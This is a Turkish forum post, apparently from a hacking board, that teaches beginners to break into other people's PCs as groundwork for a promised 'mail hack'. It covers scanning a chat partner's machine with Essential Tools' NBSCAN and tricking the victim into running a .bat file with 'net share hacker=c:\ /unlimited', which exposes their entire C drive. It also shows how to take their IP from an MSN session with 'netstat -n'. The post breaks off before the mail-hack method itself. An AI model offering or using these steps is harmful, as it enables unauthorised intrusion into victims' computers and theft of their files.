Arkadaşlar bu konu mutlaka birçok yerde verilmiştir ama bilmeyenler ya da yeni başlayanlar için paylaşmak istedim.
Size şimdi mail hackde çağır acacak bir yontem anlatacagım.Bu uygulamayı gerceklertırebılmek ıcın 3 uygulamayı bılmemız gerekıyor.Bir tanesi Essential Tools ile Paylasımları acık Pc lere girmek , diğeri paylasımları kapalı olan pc ler paylasıma acmak bir diğeri ise IP msn den karsıdakının Ip numarasını almak Şimdi bu 3 yontemıde teker teker anlatacagıM ve buldugum mail hack yontemıne gececegım.
1. yöntem(Essential Tools İle Pc lere girmek)
Bir kaynaktan bularak Essential Tools programını pc mize yukluyoruz.Sonra Msn de konusurken karsı pc nın IP numarasını alarak Essential Tools'u acıyoruz Ve NBSCAN bolumune gırıyoruz PC gozukunce Sag tıklayıp open computer dıyoruz.(Paylasımı acık pc lerde)
2.Yöntem(Paylaşımları kapalı pc leri paylaşıma açmak)
Evet arkadaşlar karsıdakı pc nın paylasımı kapalı ise paylasıma şu kodları bır not defterıne yazıp '' .bat '' uzantısına cevırerek karwsı pc ye actırmamız gerekıyor.Actırınca IP yi alıp EssentiaL tools ile pc ye dalacaz.
---------------------------------------------------
Kodlar:
Kod:
net share hacker=c:\ /unlimited /remark:"RockStar"
----------------------------------------------------------
Bu kodlar karsı pc de C dıskını paylasıma acar...
3.Yöntem (Msn 'den IP numarası almak)
Msn'den IP almayı genellıkle bılır herkes ama ben yınede yazayım dedim.Msn den karsı pc ıle konusurken MS-DOS'u acıyoruz ve MS-DOS'a Şu komutu yazıyoruz...
Kod:
netstat -n